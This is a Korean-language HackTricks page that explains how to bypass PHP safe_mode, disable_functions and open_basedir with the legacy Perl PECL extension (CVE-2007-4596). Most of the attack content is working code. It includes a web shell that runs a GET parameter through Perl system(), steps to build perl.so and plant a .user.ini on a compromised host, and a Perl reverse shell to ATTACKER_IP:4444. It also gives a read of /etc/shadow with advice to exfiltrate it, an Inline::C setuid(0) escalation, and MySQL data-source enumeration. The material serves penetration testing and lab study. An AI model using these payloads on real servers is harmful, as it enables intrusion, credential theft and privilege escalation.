PHP Perl Extension Safe_mode Bypass Exploit

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

• 구독 계획 확인하기!
• **💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
• HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.

배경

문제는 CVE-2007-4596로 추적되며, 레거시 perl PHP extension에서 비롯됩니다. 이 확장은 완전한 Perl 인터프리터를 포함하며 PHP의 safe_mode, disable_functions, open_basedir 제어를 무시합니다. extension=perl.so를 로드하는 PHP 워커는 Perl eval에 대한 무제한 접근을 얻어, 전통적인 PHP 프로세스 생성 프리미티브가 모두 차단되어도 명령 실행이 매우 쉽습니다. safe_mode는 PHP 5.4에서 사라졌지만, 구식 공유 호스팅 스택과 취약한 실습 환경에는 아직 남아 있으므로 레거시 제어판에 접근했을 때 이 우회는 여전히 유용합니다.

호환성 및 패키징 상태 (2025)

• 마지막 PECL 릴리스 (perl-1.0.1, 2013)은 PHP ≥5.0을 대상으로 합니다; Zend APIs 변경으로 PHP 8+에서는 일반적으로 실패합니다.
• PECL은 PIE로 대체되고 있지만, 오래된 스택은 여전히 PECL/pear를 제공합니다. PHP 5/7 표적에는 아래 절차를 사용하세요; 최신 PHP에서는 다운그레이드하거나 다른 주입 경로(예: userland FFI)로 전환해야 할 수 있습니다.

테스트 가능한 환경 구축 (2025)

• PECL에서 perl-1.0.1을 가져와 공격하려는 PHP 브랜치용으로 컴파일한 뒤 전역(php.ini) 또는 dl()을 통해 로드하세요(허용되는 경우).
• Quick Debian-based lab recipe:

sudo apt install php5.6 php5.6-dev php-pear build-essential
sudo pecl install perl-1.0.1
echo "extension=perl.so" | sudo tee /etc/php/5.6/mods-available/perl.ini
sudo phpenmod perl && sudo systemctl restart apache2

• 공격 중에는 var_dump(extension_loaded('perl')); 또는 print_r(get_loaded_extensions());로 사용 가능 여부를 확인하세요. 없으면 perl.so를 검색하거나 쓰기 가능한 php.ini/.user.ini 항목을 악용해 강제 로드하세요.
• 인터프리터가 PHP 워커 내부에 존재하므로 외부 바이너리는 필요 없습니다—네트워크 이그레스 필터나 proc_open 블랙리스트는 영향을 주지 않습니다.

phpize에 접근 가능한 경우의 온호스트 빌드 체인

만약 phpize와 build-essential이 손상된 호스트에 존재한다면, OS에 셸을 실행하지 않고도 perl.so를 컴파일해 배치할 수 있습니다:

# grab the tarball from PECL
wget https://pecl.php.net/get/perl-1.0.1.tgz
tar xvf perl-1.0.1.tgz && cd perl-1.0.1
phpize
./configure --with-perl=/usr/bin/perl --with-php-config=$(php -r 'echo PHP_BINARY;')-config
make -j$(nproc)
cp modules/perl.so /tmp/perl.so
# then load with a .user.ini in the webroot if main php.ini is read-only
echo "extension=/tmp/perl.so" > /var/www/html/.user.ini

open_basedir가 적용되어 있다면, 생성한 .user.ini와 .so가 허용된 경로에 위치하는지 확인하세요; extension= 디렉티브는 basedir 내부에서도 여전히 적용됩니다. 컴파일 흐름은 PECL 확장 빌드를 위한 PHP 매뉴얼을 따릅니다.

Original PoC (NetJackal)

From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/, 여전히 확장이 eval에 응답하는지 확인하는 데 유용합니다:

<?php
if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('".$_GET['cmd']."')");
echo "&lt;/textarea&gt;";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>";
?>

최신 Payload 개선

1. Full TTY over TCP

임베디드 인터프리터는 /usr/bin/perl가 차단되어 있어도 IO::Socket을 로드할 수 있다:

$perl = new perl();
$payload = <<<'PL'
use IO::Socket::INET;
my $c = IO::Socket::INET->new(PeerHost=>'ATTACKER_IP',PeerPort=>4444,Proto=>'tcp');
open STDIN,  '<&', $c;
open STDOUT, '>&', $c;
open STDERR, '>&', $c;
exec('/bin/sh -i');
PL;
$perl->eval($payload);

2. open_basedir가 설정되어 있어도 파일 시스템 탈출

Perl은 PHP의 open_basedir을 무시하므로 임의의 파일을 읽을 수 있습니다:

$perl = new perl();
$perl->eval('open(F,"/etc/shadow") || die $!; print while <F>; close F;');

출력을 IO::Socket::INET 또는 Net::HTTP로 파이프하여 PHP가 관리하는 디스크립터를 건드리지 않고 데이터를 exfiltrate 하세요.

3. 인라인 컴파일 for Privilege Escalation

시스템 전역에 Inline::C가 존재한다면, PHP의 ffi나 pcntl에 의존하지 않고 요청 내부에서 헬퍼를 컴파일하세요:

$perl = new perl();
$perl->eval(<<<'PL'
use Inline C => 'DATA';
print escalate();
__DATA__
__C__
char* escalate(){ setuid(0); system("/bin/bash -c 'id; cat /root/flag'"); return ""; }
PL
);

4. Living-off-the-Land Enumeration

Perl을 LOLBAS 툴킷처럼 다뤄라 — 예: mysqli가 없어도 MySQL DSNs를 덤프하라:

$perl = new perl();
$perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);');

참고자료

• CVE-2007-4596 summary and timeline
• PECL perl extension package information
• PHP Manual: building PECL extensions with phpize
• PECL homepage announcing PIE replacement

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

• 구독 계획 확인하기!
• **💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
• HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.